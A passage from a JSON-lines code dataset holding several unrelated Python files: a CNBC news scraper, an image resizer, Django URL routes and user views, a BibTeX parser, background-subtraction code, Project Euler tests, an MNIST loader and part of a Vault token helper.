selenium.webdriver.chrome.options import Options\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom dateutil.parser import parse\r\nimport time\r\n\r\n\r\nclass NewspaperScraper:\r\n def __init__ (self, dateStart, dateEnd):\r\n self.searchTerm1 = 'bank'\r\n self.searchTerm2='coronavirus'\r\n self.dateStart = parse(dateStart)\r\n self.dateEnd = parse(dateEnd)\r\n self.links = []\r\n\r\n\r\n def check_dates (self, date):\r\n page_date = parse(date)\r\n if page_date >= self.dateStart and page_date <= self.dateEnd:\r\n return True\r\n return False\r\n\r\n\r\n def write_to_csv (self, data, file_name):\r\n print ('writing to CSV...')\r\n\r\n keys = data[0].keys()\r\n with open(file_name, 'a+',encoding='utf-8',newline='') as output_file:\r\n dict_writer = csv.DictWriter(output_file, keys)\r\n dict_writer.writeheader()\r\n dict_writer.writerows(data)\r\n print('written to file')\r\n\r\n \r\n def check_keywords(self,s):\r\n if re.search('coronavirus',s.lower()) is not None or re.search('covid',s.lower()) is not None:\r\n if re.search('bank',s.lower()) is not None :\r\n return True\r\n return False\r\n\r\n \r\n\r\n\r\n\r\n\r\nclass CNBCScraper(NewspaperScraper):\r\n\r\n def get_pages (self, sleep_time=3):\r\n print ('running get_pages()...')\r\n\r\n links = {}\r\n stop = False\r\n index = 1\r\n days = (self.dateEnd.date() - self.dateStart.date()).days + 1\r\n\r\n chrome_options = Options()\r\n chrome_options.add_argument(\"--headless\")\r\n\r\n \r\n driver = webdriver.Chrome(options=chrome_options,executable_path=r\"C:\\Users\\suryansh\\Downloads\\chromedriver_win32 (2)\\chromedriver.exe\")\r\n driver.get('http://search.cnbc.com/rs/search/view.html?partnerId=2000'\r\n + '&keywords=' + self.searchTerm1\r\n + '%2C'\r\n + self.searchTerm2\r\n + '&sort=date&type=news&source=CNBC.com'\r\n + '&pubtime=' + str(days) + '&pubfreq=d'\r\n )\r\n time.sleep(15)\r\n\r\n\r\n ele=driver.find_element_by_xpath('//select[@class=\"minimal SearchResults-searchResultsSelect\"]')\r\n ele.find_element_by_xpath(\".//option[contains(text(), 'Articles')]\").click()\r\n time.sleep(sleep_time)\r\n \r\n for i in range(50):\r\n\r\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);var lenOfPage=document.body.scrollHeight;return lenOfPage;\")\r\n time.sleep(2)\r\n\r\n results=driver.find_elements_by_xpath('//div[@class=\"SearchResult-searchResult SearchResult-standardVariant\"]')\r\n\r\n main_data=[]\r\n\r\n for result in results:\r\n try:\r\n pub_date = result.find_element_by_xpath(\".//span[@class='SearchResult-publishedDate']\").text\r\n\r\n ltext = result.find_element_by_xpath('.//span[@class=\"Card-title\"]').text\r\n link = result.find_element_by_xpath('.//a[@class=\"resultlink\"]').get_attribute('href')\r\n print(link)\r\n if self.check_keywords(ltext) and not links.get(link,False) and self.check_dates(pub_date):\r\n links[link]=True\r\n driver.execute_script(\"window.open('');\")\r\n driver.switch_to.window(driver.window_handles[1])\r\n driver.get(link)\r\n time.sleep(10)\r\n p=''\r\n for para in driver.find_elements_by_xpath('//div[@class=\"group\"]'):\r\n for e in para.find_elements_by_xpath('.//p'):\r\n p+=e.text\r\n \r\n data = {\r\n 'title': ltext,\r\n 'date_published': pub_date,\r\n 'article_link': link,\r\n 'text': p\r\n }\r\n print(data['title'])\r\n main_data.append(data)\r\n time.sleep(sleep_time)\r\n driver.close()\r\n driver.switch_to.window(driver.window_handles[0])\r\n except Exception as e:\r\n print(e)\r\n\r\n self.links = links\r\n return main_data\r\n \r\nstart=input('From date in format yyyy-mm-dd :- ')\r\nend=input(' date in format yyyy-mm-dd :- ')\r\ndef run_scraper (start,end):\r\n scraper=CNBCScraper(start,end)\r\n data=scraper.get_pages()\r\n if len(data)==0:\r\n print('NO news related to current keywords in specified range')\r\n else:\r\n scraper.write_to_csv(data,'CNBCScraper.csv')\r\n \r\n \r\nrun_scraper(start,end)\r\n\r\n \r\n ", "sub_path": "CNBC_ARTICLE_SCRAPER.py", "file_name": "CNBC_ARTICLE_SCRAPER.py", "file_ext": "py", "file_size_in_byte": 5058, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "dateutil.parser.parse", "line_number": 20, "usage_type": "call"}, {"api_name": "dateutil.parser.parse", "line_number": 21, "usage_type": "call"}, {"api_name": "dateutil.parser.parse", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 26, "usage_type": "argument"}, {"api_name": "csv.DictWriter", "line_number": 37, "usage_type": "call"}, {"api_name": "re.search", "line_number": 44, "usage_type": "call"}, {"api_name": "re.search", "line_number": 45, "usage_type": "call"}, {"api_name": "selenium.webdriver.chrome.options.Options", "line_number": 64, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 68, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 68, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 76, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 81, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 86, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 104, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 118, "usage_type": "call"}]} +{"seq_id": "651632408", "text": "from PIL import Image\nimport os\nimport math\n\nimages_path = ('PATH')\nsize = 300*300\ndestination_path = (images_path + '\\\\modified_images') # The destination where the modified files will be saved.\n\ntry:\n os.mkdir(destination_path)\nexcept FileExistsError:\n pass\n\n# This for loop takes a directory with images, rotates them to be all vertical and resizes according to desired size\n# while maintaining the same width/height ratio\nimage_count = 1\nfor file in os.listdir(images_path):\n if os.path.isdir(images_path + '\\\\' + file):\n continue\n else:\n image = Image.open(images_path + '\\\\' + file)\n width, height = image.size\n area = width * height\n ratio = math.sqrt(size/area)\n new_width = int(round(width * ratio))\n new_height = int(round(height * ratio))\n image = image.resize((new_width, new_height))\n if width > height:\n image = image.rotate(90)\n image.save('{}/image{}.jpg'.format(destination_path, str(image_count)))\n image_count += 1\n", "sub_path": "Photo_manipulation.py", "file_name": "Photo_manipulation.py", "file_ext": "py", "file_size_in_byte": 1035, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.mkdir", "line_number": 10, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 21, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 21, "usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 24, "usage_type": "call"}]} +{"seq_id": "311456137", "text": "from django.conf.urls import include, url\nfrom django.contrib import admin\n\n#from welcome.views import index, health\nfrom welcome import views\nfrom django.conf.urls.static import static\nfrom django.conf import settings\n\nurlpatterns = [\n url(r'^health$', views.home, name = 'home'),\n\n url(r'^$', views.home, name = 'home'),\n url(r'^chapters$', views.chapters, name = 'chapters'),\n url(r'^login', views.login, name = 'login'),\n url(r'^logout', views.logout, name = 'logout'),\n url(r'^register', views.register, name = 'register'),\n url(r'^uniqueChapters', views.uniqueChapters, name = 'uniqueChapters'),\n url(r'^uniqueBook', views.uniqueBook, name = 'uniqueBook'),\n\n url(r'^book/(?P[a-zA-Z0-9]+)', views.book, name = 'book'),\n url(r'^cover', views.cover, name = 'cover'),\n\n\n url(r'^admin/', admin.site.urls),\n\n url(r'^chapterslist/$', views.upload_chapter, name = 'chapter_list'),\n\n url(r'^uploadchapter', views.upload_chapter, name = 'upload_chapter'),\n\n]+ static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)", "sub_path": "project/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1061, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "welcome.views.home", "line_number": 10, "usage_type": "attribute"}, {"api_name": "welcome.views", "line_number": 10, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "welcome.views.home", "line_number": 12, "usage_type": "attribute"}, {"api_name": "welcome.views", "line_number": 12, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "welcome.views.chapters", "line_number": 13, "usage_type": "attribute"}, {"api_name": "welcome.views", "line_number": 13, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "welcome.views.login", "line_number": 14, "usage_type": "attribute"}, {"api_name": "welcome.views", "line_number": 14, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "welcome.views.logout", "line_number": 15, "usage_type": "attribute"}, {"api_name": "welcome.views", "line_number": 15, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "welcome.views.register", "line_number": 16, "usage_type": "attribute"}, {"api_name": "welcome.views", "line_number": 16, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}, {"api_name": "welcome.views.uniqueChapters", "line_number": 17, "usage_type": "attribute"}, {"api_name": "welcome.views", "line_number": 17, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 18, "usage_type": "call"}, {"api_name": "welcome.views.uniqueBook", "line_number": 18, "usage_type": "attribute"}, {"api_name": "welcome.views", "line_number": 18, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 20, "usage_type": "call"}, {"api_name": "welcome.views.book", "line_number": 20, "usage_type": "attribute"}, {"api_name": "welcome.views", "line_number": 20, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 21, "usage_type": "call"}, {"api_name": "welcome.views.cover", "line_number": 21, "usage_type": "attribute"}, {"api_name": "welcome.views", "line_number": 21, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 24, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 24, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 24, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 26, "usage_type": "call"}, {"api_name": "welcome.views.upload_chapter", "line_number": 26, "usage_type": "attribute"}, {"api_name": "welcome.views", "line_number": 26, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 28, "usage_type": "call"}, {"api_name": "welcome.views.upload_chapter", "line_number": 28, "usage_type": "attribute"}, {"api_name": "welcome.views", "line_number": 28, "usage_type": "name"}, {"api_name": "django.conf.urls.static.static", "line_number": 30, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_URL", "line_number": 30, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 30, "usage_type": "name"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 30, "usage_type": "attribute"}]} +{"seq_id": "198186372", "text": "from django.shortcuts import render\nfrom django.http import HttpResponse, JsonResponse\nfrom lab4.models import *\nimport json\n# Create your views here.\n\ndef getUsersList(request):\n results = {}\n data = []\n for user in Users.objects.all():\n tmp = {}\n tmp['id'] = user.id\n tmp['name'] = user.name\n tmp['surname'] = user.surname\n data.append(tmp)\n results['Users'] = data\n return JsonResponse(data=results)\n\ndef setUser(request):\n name = request.GET['name']\n surname = request.GET['surname']\n student = Users(name=name, surname=surname)\n student.save()\n json_data = {\"success\":True}\n return JsonResponse(data=json_data)\n\ndef editUser(request):\n id = request.GET['id']\n newName = request.GET['name']\n newSurname = request.GET['surname']\n student = Users.objects.get(id=id)\n student.name = newName\n student.surname = newSurname\n student.save()\n json_data = {\"success\":True}\n return JsonResponse(data=json_data)\n\ndef getUser(request):\n id = request.GET['id']\n student = Users.objects.get(id=id)\n name = student.name\n surname = student.surname\n json_data = {\"name\":name, \"surname\":surname }\n return JsonResponse(data=json_data)\n\ndef deleteUser(request):\n id = request.GET['id']\n student = Users.objects.get(id=id)\n student.delete()\n name = student.name\n surname = student.surname\n json_data = {\"success\":True }\n return JsonResponse(data=json_data)", "sub_path": "11BD02042/lab4MCserver/lab4/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1473, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.http.JsonResponse", "line_number": 17, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 25, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 36, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 44, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "620034590", "text": "import itertools\nimport bibtexparser\nfrom bidict import inverted\n\nwith open('bibtex/data/uist-2021.bib') as bibtex_file:\n bib_database = bibtexparser.load(bibtex_file)\n\n# print(bib_database.entries)\n\nunique_keywords = []\ncombination_list = []\n\nfor entry in bib_database.entries:\n # print(entry['author'].split(' and '))\n try:\n keyword_list = entry['keywords'].split(',')\n keyword_list = [x.strip().lower().replace('.', '') for x in keyword_list]\n for combination in itertools.combinations(keyword_list, 2):\n tuple = f\"{combination[0]} - {combination[1]}\"\n print(tuple)\n combination_list.append(tuple)\n for keyword in keyword_list:\n # print(keyword.strip().lower())\n unique_keywords.append(keyword.strip().lower())\n except:\n pass\n\n# print(len(unique_keywords))\n# counting = dict()\n# for keyword in unique_keywords:\n# counting[keyword] = counting.get(keyword, 0) + 1\n# for w in sorted(counting, key=counting.get,reverse=True):\n# print(w, counting[w])\n# print(counting)\nunique_keywords = list(dict.fromkeys(unique_keywords))\n# print(len(unique_keywords))\n# print(unique_keywords)\n ", "sub_path": "bibtex/bibtex-reader-bibtexparser.py", "file_name": "bibtex-reader-bibtexparser.py", "file_ext": "py", "file_size_in_byte": 1129, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "bibtexparser.load", "line_number": 6, "usage_type": "call"}, {"api_name": "itertools.combinations", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "523915287", "text": "import cv2\nimport numpy as np\nimport os\nimport sys\nfrom utils import *\nfrom hole_filling import hole_filling, hole_filling2\nfrom task1 import task1\nfrom estimator_adaptative import evaluate\nfrom morphology import Opening\nfrom sklearn import metrics\nfrom estimator_adaptative import week2_masks\nfrom morphology import Dilatation, Closing\n\n\n\n\ndata_path = '../../databases'\nPlotsDirectory = '../plots/Week3/task3/'\n\nif not os.path.exists(PlotsDirectory):\n os.makedirs(PlotsDirectory)\n\nnames = ['highway', 'fall', 'traffic']\nestimation_range = [np.array([1050, 1200]), np.array([1460, 1510]), np.array([950, 1000])]\nprediction_range = [np.array([1201, 1350]), np.array([1511, 1560]), np.array([1001, 1050])]\n\ndef task3(X_est, X_pred, rho, alpha, apply = True):\n\n mask = week2_masks(X_est, X_pred, rho=rho, alpha=alpha)\n\n kernel_closing = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(7, 7))\n kernel_opening = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (4, 4))\n kernel_opening1 = np.ones((2, 2), np.uint8)\n\n if apply:\n mask = Closing(mask, kernel_closing)\n mask = hole_filling2(mask, connectivity=8, visualize=False)\n if apply:\n mask = Opening(mask, kernel_opening)\n else:\n mask = Opening(mask, kernel_opening1)\n\n\n return mask\n\n\ndef compute_AUC(X_est, X_pred, y_pred, alpha_range, rho, pixels):\n Pr = []\n Re = []\n for alpha in alpha_range:\n print(alpha)\n X_res = task2(X_est, X_pred, rho, alpha, pixels)\n Pr.append(evaluate(X_res, y_pred, \"precision\"))\n Re.append(evaluate(X_res, y_pred, \"recall\"))\n\n return metrics.auc(Re, Pr, True)\n\n\n\ndef main():\n data_path = '../../databases'\n PlotsDirectory = '../plots/Week3/task3/'\n\n if not os.path.exists(PlotsDirectory):\n os.makedirs(PlotsDirectory)\n\n names = ['highway', 'fall', 'traffic']\n estimation_range = [np.array([1050, 1200]), np.array([1460, 1510]), np.array([950, 1000])]\n prediction_range = [np.array([1201, 1350]), np.array([1511, 1560]), np.array([1001, 1050])]\n\n a = [{'min': 0, 'max': 40, 'step': 1}, {'min': 0, 'max': 40, 'step': 1}, {'min': 0, 'max': 40, 'step': 1}]\n\n params = { 'highway': {'alpha': 7.25, 'rho': 0.6},\n 'fall': {'alpha': 3.2, 'rho': 0.004},\n 'traffic': {'alpha': 10.67, 'rho': 0}}\n\n n_pixels = 20\n for i in range(len(names)):\n #i = 0\n [X_est, y_est] = load_data(data_path, names[i], estimation_range[i], grayscale=True)\n [X_pred, y_pred] = load_data(data_path, names[i], prediction_range[i], grayscale=True)\n\n mask3 = task3(X_est, X_pred, params[names[i]]['rho'], params[names[i]]['alpha'], True)\n maskno3 = task3(X_est, X_pred, params[names[i]]['rho'], params[names[i]]['alpha'], False)\n print(names[i] + \": F1 score new = \" + str(evaluate(mask3, y_pred, 'f1')))\n print(names[i] + \": F1 score past = \" + str(evaluate(maskno3, y_pred, 'f1')))\n\n pr = evaluate(mask3, y_pred, \"precision\")\n re = evaluate(mask3, y_pred, \"recall\")\n\n pr_no = evaluate(maskno3, y_pred, \"precision\")\n re_no = evaluate(maskno3, y_pred, \"recall\")\n\n\n\n\n\nif __name__ == \"__main__\":\n main()\n\n\n\n# ================== TESTING ================\n#im = hole_filling(images=X_pred, visualize=True) # Manual sequence: press \"Enter\" to advance in the sequence\n#hole_filling2(images=X_pred, connectivity=8, visualize=True) # Manual sequence: press \"Enter\" to advance in the sequence\n\n\n", "sub_path": "Week4/backup_week2/task3.py", "file_name": "task3.py", "file_ext": "py", "file_size_in_byte": 3459, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.exists", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 25, "usage_type": "call"}, {"api_name": "estimator_adaptative.week2_masks", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.getStructuringElement", "line_number": 31, "usage_type": "call"}, {"api_name": "cv2.MORPH_ELLIPSE", "line_number": 31, "usage_type": "attribute"}, {"api_name": "cv2.getStructuringElement", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.MORPH_ELLIPSE", "line_number": 32, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 33, "usage_type": "attribute"}, {"api_name": "morphology.Closing", "line_number": 36, "usage_type": "call"}, {"api_name": "hole_filling.hole_filling2", "line_number": 37, "usage_type": "call"}, {"api_name": "morphology.Opening", "line_number": 39, "usage_type": "call"}, {"api_name": "morphology.Opening", "line_number": 41, "usage_type": "call"}, {"api_name": "estimator_adaptative.evaluate", "line_number": 53, "usage_type": "call"}, {"api_name": "estimator_adaptative.evaluate", "line_number": 54, "usage_type": "call"}, {"api_name": "sklearn.metrics.auc", "line_number": 56, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 56, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 69, "usage_type": "call"}, {"api_name": "estimator_adaptative.evaluate", "line_number": 85, "usage_type": "call"}, {"api_name": "estimator_adaptative.evaluate", "line_number": 86, "usage_type": "call"}, {"api_name": "estimator_adaptative.evaluate", "line_number": 88, "usage_type": "call"}, {"api_name": "estimator_adaptative.evaluate", "line_number": 89, "usage_type": "call"}, {"api_name": "estimator_adaptative.evaluate", "line_number": 91, "usage_type": "call"}, {"api_name": "estimator_adaptative.evaluate", "line_number": 92, "usage_type": "call"}]} +{"seq_id": "344010241", "text": "import pytest\nfrom sampleproject.www.Project_Euler.problem051_100 import problem060\n\n\ndef test_resolved_problem():\n cls = problem060.problem_060()\n cls.prim_set = [3, 7, 109, 673]\n assert cls.resolved_problem() == 792\n\n\ntest_is_prim_decision_list = [\n (1, False),\n (2, True),\n (3, True),\n (4, False),\n (5, True),\n (6, False),\n (7, True),\n (8, False),\n (9, False),\n (10, False),\n (11, True)\n]\n@pytest.mark.parametrize(\"num, exp\", test_is_prim_decision_list)\ndef test_is_prim_decision(num, exp) -> None:\n cls = problem060.problem_060()\n assert cls.is_prim_decision(num) == exp\n\n\ntest_is_quite_remarkable_prim_number_combination_list = [\n ((3, 7, 109, 673), True),\n ((4, 7, 109, 673), False),\n ((2, 3, 5, 7), False)\n]\n@pytest.mark.parametrize(\"prim_num_list, exp\", test_is_quite_remarkable_prim_number_combination_list)\ndef test_is_quite_remarkable_prim_number_combination(prim_num_list, exp):\n cls = problem060.problem_060()\n assert cls.is_quite_remarkable_prim_number_combination(list(prim_num_list)) == exp\n\n", "sub_path": "tests/sampleproject/www/Project_Euler/problem051_100/test_problem060.py", "file_name": "test_problem060.py", "file_ext": "py", "file_size_in_byte": 1071, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sampleproject.www.Project_Euler.problem051_100.problem060.problem_060", "line_number": 6, "usage_type": "call"}, {"api_name": "sampleproject.www.Project_Euler.problem051_100.problem060", "line_number": 6, "usage_type": "name"}, {"api_name": "sampleproject.www.Project_Euler.problem051_100.problem060.problem_060", "line_number": 26, "usage_type": "call"}, {"api_name": "sampleproject.www.Project_Euler.problem051_100.problem060", "line_number": 26, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 24, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 24, "usage_type": "attribute"}, {"api_name": "sampleproject.www.Project_Euler.problem051_100.problem060.problem_060", "line_number": 37, "usage_type": "call"}, {"api_name": "sampleproject.www.Project_Euler.problem051_100.problem060", "line_number": 37, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 35, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 35, "usage_type": "attribute"}]} +{"seq_id": "591072086", "text": "from torch.utils.data import Dataset, DataLoader\nimport torchvision\nfrom skimage import io\nimport torch\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nimport numpy as np\nfrom torchvision import transforms, utils\n\n\"\"\"\n测试自己写代码读取mnist训练,不使用系统写好的接口\n1.解析出mnist的文件,变成图片文件\n2.写自定义的Dataset,需要重写__init__,__getitem__, __len__这三个函数\n\n依赖:\npip install --user scikit-image\npip install --user scipy\n\"\"\"\n\ndef unzip_mnist():\n \"\"\"\n 解析mnist文件,变成图片\n :return:\n \"\"\"\n mnist_data_test = torchvision.datasets.MNIST(root=r'D:\\work\\data', train=False, download=True)\n print('test set:', len(mnist_data_test))\n\n f = open(r'D:\\work\\data\\MNIST\\image\\mnist_test.txt', 'w')\n for i, (img, label) in enumerate(mnist_data_test):\n img_path = \"D:/work/data/MNIST/image/test/\" + str(i) + \".jpg\"\n io.imsave(img_path, np.array(img)) # 这里要注意,如果直接使用img,会出现如下错误:'Image' object has no attribute 'dtype',需要np.array(img)\n f.write(img_path+' '+str(label)+'\\n')\n f.close()\n\n\ndef default_loader(path):\n return Image.open(path).convert('RGB')\n\n\nclass MnistDataset(Dataset):\n \"\"\"\n 自定义的dataset,需要实现__init__, __getitem__, __len__三个文件\n \"\"\"\n def __init__(self, txt, transform=None, target_transform=None, loader=default_loader):\n fh = open(txt, 'r')\n imgs = []\n for line in fh:\n line = line.strip('\\n')\n line = line.rstrip()\n words = line.split()\n imgs.append((words[0], int(words[1])))\n self.imgs = imgs\n self.transform = transform\n self.target_transform = target_transform\n self.loader = loader\n\n def __getitem__(self, item):\n fn, label = self.imgs[item]\n img = self.loader(fn)\n if self.transform is not None:\n img = self.transform(img)\n return img, label\n\n def __len__(self):\n return len(self.imgs)\n\n\ndef show_batch(imgs):\n grid = utils.make_grid(imgs)\n plt.imshow(grid.numpy().transpose((1, 2, 0)))\n plt.title('Batch from dataloader')\n\n\ndef use_custom_mnistdataset_test():\n train_data = MnistDataset(txt=r'D:\\work\\data\\MNIST\\image\\mnist_test.txt', transform=transforms.ToTensor())\n data_loader = DataLoader(train_data, batch_size=100, shuffle=True)\n print(len(data_loader))\n\n for i, (batch_x, batch_y) in enumerate(data_loader):\n if (i < 4):\n print(i, batch_x.size(), batch_y.size())\n show_batch(batch_x)\n plt.axis('off')\n plt.show()\n\n\nif __name__ == '__main__':\n # unzip_mnist()\n use_custom_mnistdataset_test()\n\n\n", "sub_path": "Pytorch/mnist/data.py", "file_name": "data.py", "file_ext": "py", "file_size_in_byte": 2753, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torchvision.datasets.MNIST", "line_number": 25, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 25, "usage_type": "attribute"}, {"api_name": "skimage.io.imsave", "line_number": 31, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 31, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 31, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 37, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 37, "usage_type": "name"}, {"api_name": "torch.utils.data.Dataset", "line_number": 40, "usage_type": "name"}, {"api_name": "torchvision.utils.make_grid", "line_number": 69, "usage_type": "call"}, {"api_name": "torchvision.utils", "line_number": 69, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 70, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 71, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 75, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}]} +{"seq_id": "585698259", "text": "\"\"\" Vault interactions \"\"\"\nfrom __future__ import print_function\nimport os\nimport socket\nimport hvac\nimport yaml\n# need to override those SSL warnings\nimport requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nfrom aomi.helpers import log, cli_hash, merge_dicts, abspath\nfrom aomi.template import render, load_var_files\nfrom aomi.error import output as error_output\nfrom aomi.util import token_file, appid_file\nimport aomi.error\nimport aomi.exceptions\n\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\n\ndef approle_token(vault_client, role_id, secret_id):\n \"\"\"Returns a vault token based on the role and seret id\"\"\"\n resp = vault_client.auth_approle(role_id, secret_id)\n if 'auth' in resp and 'client_token' in resp['auth']:\n return resp['auth']['client_token']\n else:\n raise aomi.exceptions.AomiCredentials('invalid approle')\n\n\ndef app_token(vault_client, app_id, user_id):\n \"\"\"Returns a vault token based on the app and user id.\"\"\"\n resp = vault_client.auth_app_id(app_id, user_id)\n if 'auth' in resp and 'client_token' in resp['auth']:\n return resp['auth']['client_token']\n else:\n raise aomi.exceptions.AomiCredentials('invalid apptoken')\n\n\ndef initial_token(vault_client, opt):\n \"\"\"Generate our first token based on workstation configuration\"\"\"\n\n app_filename = appid_file()\n token_filename = token_file()\n if 'VAULT_TOKEN' in os.environ and os.environ['VAULT_TOKEN']:\n log('Token derived from VAULT_TOKEN environment variable', opt)\n return os.environ['VAULT_TOKEN'].strip()\n elif 'VAULT_USER_ID' in os.environ and \\\n 'VAULT_APP_ID' in os.environ and \\\n os.environ['VAULT_USER_ID'] and os.environ['VAULT_APP_ID']:\n token = app_token(vault_client,\n os.environ['VAULT_APP_ID'].strip(),\n os.environ['VAULT_USER_ID'].strip())\n log(\"Token derived from VAULT_APP_ID and VAULT_USER_ID\", opt)\n return token\n elif 'VAULT_ROLE_ID' in os.environ and \\\n 'VAULT_SECRET_ID' in os.environ and \\\n os.environ['VAULT_ROLE_ID'] and os.environ['VAULT_SECRET_ID']:\n token = approle_token(vault_client,\n os.environ['VAULT_ROLE_ID'],\n os.environ['VAULT_SECRET_ID'])\n log(\"Token derived from VAULT_ROLE_ID and VAULT_SECRET_ID\", opt)\n return token\n elif app_filename:\n token = yaml.safe_load(open(app_filename).read().strip())\n if 'app_id' in token and 'user_id' in token:\n token = app_token(vault_client,\n token['app_id'],\n token['user_id'])\n log(\"Token derived from %s\" % app_filename, opt)\n return token\n elif token_filename:\n log(\"Token derived from %s\" % token_filename, opt)\n return open(token_filename, 'r').read().strip()\n else:\n raise aomi.exceptions.AomiCredentials('unknown method')\n\n\ndef token_meta(operation, opt):\n \"\"\"Generates metadata for a token\"\"\"\n meta = {\n 'via': 'aomi',\n 'operation': operation,\n 'hostname': socket.gethostname()\n }\n if 'USER' in os.environ:\n meta['unix_user'] = os.environ['USER']\n\n if opt.metadata:\n meta_bits = opt.metadata.split(',')\n for meta_bit in meta_bits:\n key, value = meta_bit.split('=')\n\n if key not in meta:\n meta[key] = value\n\n for key, value in meta.items():\n log(\"Token metadata %s %s\" % (key, value), opt)\n\n 